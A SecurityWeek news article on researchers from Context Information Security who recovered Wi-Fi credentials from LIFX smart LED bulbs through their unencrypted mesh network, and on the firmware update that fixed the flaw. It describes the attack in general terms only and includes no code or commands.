Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Vulnerabilities

Researchers Hack Smartphone-Controlled LED Light Bulbs

Wi-Fi enabled LED light bulbs manufactured by LIFX have been hacked by researchers from Context Information Security, the company said Friday.

Wi-Fi enabled LED light bulbs manufactured by LIFX have been hacked by researchers from Context Information Security, the company said Friday.

The energy efficient light bulbs are designed to use a Wi-Fi connection to allow users to control them through a smartphone application. As part of its effort to raise awareness of Internet of Things (IoT) security, Context demonstrated that the lack of protection measures enables an attacker within the wireless range to control all connected bulbs and expose user network configurations such as Wi-Fi credentials.

According to Context, there are three main communication components: bulb Wi-Fi communication, smartphone to bulb communication, and bulb mesh network communication. The system is designed so that only a master bulb is connected to the Wi-Fi network through which it receives commands from the smartphone. The other bulbs get the commands from the master bulb over an 802.15.4 6LoWPAN wireless mesh network. When a new bulb is added, it receives the Wi-Fi details, information which is encrypted, from the master bulb.  

Vulnerability Found in Smartphone-Controlled LED Light Bulbs

The first security issue found by researchers was the fact that the wireless communication protocols used for the bulb mesh network were in most part unencrypted, allowing them to inject traffic and control the light bulbs with the aid of an AMTEL AVR Raven wireless kit. By injecting arbitrary packets into the mesh network, an attacker can request Wi-Fi credentials, but the information is encrypted, Context said. Experts found a way to decrypt the information by extracting the firmware from the device and reverse engineering it.

“Armed with knowledge of the encryption algorithm, key, initialization vector and an understanding of the mesh network protocol we could then inject packets into the mesh network, capture the WiFi details and decrypt the credentials, all without any prior authentication or alerting of our presence,” Context researchers explained in a blog post.

Context reported its findings to LIFX, which released a firmware update (version 1.2) to address the security issues.  In the latest version of the firmware, 6LoWPAN traffic is encrypted and adding new bulbs to the network is done in a secure manner. Representatives from the manufacturer claim there is no evidence that the vulnerability has been exposed by anyone besides Context, most likely due to the complexity of the attack.

“Hacking into the light bulb was certainly not trivial but would be within the capabilities of experienced cyber criminals,” said Michael Jordon, research director at Context Information Security. “In some cases, these vulnerabilities can be overcome relatively quickly and easily as demonstrated by working with the LIFX developers. In other cases the vulnerabilities are fundamental to the design of the products.  What is important is that these measures are built into all IoT devices from the start and if vulnerabilities are discovered, which seems to be the case with many IoT companies, they are fixed promptly before users are affected.”

Advertisement. Scroll to continue reading.

 

Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Discover strategies for vendor selection, integration to minimize redundancies, and maximizing ROI from your cybersecurity investments. Gain actionable insights to ensure your stack is ready for tomorrow’s challenges.

Register

Dive into critical topics such as incident response, threat intelligence, and attack surface management. Learn how to align cyber resilience plans with business objectives to reduce potential impacts and secure your organization in an ever-evolving threat landscape.

Register

People on the Move

Gigamon has promoted Tony Jarjoura to CFO and Ram Bhide has been hired as Senior VP of engineering.

Cloud security firm Mitiga has appointed Charlie Thomas as Chief Executive Officer.

Cynet announced the appointment of Jason Magee as Chief Executive Officer.

More People On The Move

Expert Insights

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest cybersecurity news, threats, and expert insights. Unsubscribe at any time.